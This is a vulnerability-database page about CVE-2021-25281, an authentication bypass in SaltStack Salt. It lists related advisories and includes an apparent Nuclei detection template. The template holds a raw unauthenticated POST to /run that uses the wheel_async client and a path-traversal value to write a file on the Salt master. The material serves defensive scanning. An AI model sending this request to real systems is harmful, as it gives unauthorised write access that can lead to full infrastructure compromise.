| Reporter | Title | Published | Views | Family All 115 |
|---|---|---|---|---|
| SaltStack Salt API Unauthenticated Remote Command Execution Exploit | 2 Apr 202100:00 | – | zdt | |
| salt -- multiple vulnerabilities | 25 Feb 202100:00 | – | freebsd | |
| CVE-2021-25281 | 27 Feb 202100:00 | – | attackerkb | |
| CVE-2021-25281 | 27 Feb 202100:00 | – | alpinelinux | |
| [ASA-202102-33] salt: multiple issues | 27 Feb 202100:00 | – | archlinux | |
| The vulnerability of the configuration management system and remote execution capabilities of SaltStack Salt, related to improper access restrictions, allows a perpetrator to gain unauthorized access to other restricted functions. | 13 Dec 202100:00 | – | bdu_fstec | |
| Exploit for Improper Authentication in Saltstack Salt | 26 Feb 202112:08 | – | githubexploit | |
| CVE-2021-25281 | 26 Feb 202110:46 | – | circl | |
| Saltstack SaltStack Salt 授权问题漏洞 | 26 Feb 202100:00 | – | cnnvd | |
| SaltStack Salt Authorization Issues Vulnerability | 26 Feb 202100:00 | – | cnvd |
id: CVE-2021-25281
info:
name: SaltStack Salt <3002.5 - Auth Bypass
author: madrobot
severity: critical
description: SaltStack Salt before 3002.5 does not honor eauth credentials for the wheel_async client, allowing attackers to remotely run any wheel modules on the master.
impact: |
Unauthenticated attackers can remotely execute any wheel modules on the Salt master by bypassing eauth credentials, leading to complete infrastructure compromise and control over all managed systems.
remediation: |
Upgrade to SaltStack Salt version 3002.5 or later to mitigate this vulnerability.
reference:
- http://hackdig.com/02/hack-283902.htm
- https://dozer.nz/posts/saltapi-vulns
- https://nvd.nist.gov/vuln/detail/CVE-2021-25281
- https://github.com/saltstack/salt/releases
- https://www.saltstack.com/blog/active-saltstack-cve-announced-2021-jan-21/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-25281
cwe-id: CWE-287
epss-score: 0.72945
epss-percentile: 0.99382
cpe: cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: saltstack
product: salt
tags: cve,cve2021,saltapi,rce,saltstack,unauth,vuln,vkev
http:
- raw:
- |
POST /run HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"client":"wheel_async","fun":"pillar_roots.write","data":"testing","path":"../../../../../../../tmp/testing","username":"1","password":"1","eauth":"pam"}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "return"
- "tag"
- "jid"
- "salt"
- "wheel"
condition: and
- type: status
status:
- 200
# digest: 490a0046304402203effce90951e45853cee29264bc186a7a43c5880ed7064cc786de73c950378430220193e0e17b334a75040c910cc4deb9a85fbc1296da0251400355ccf3d59e9b3bb:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation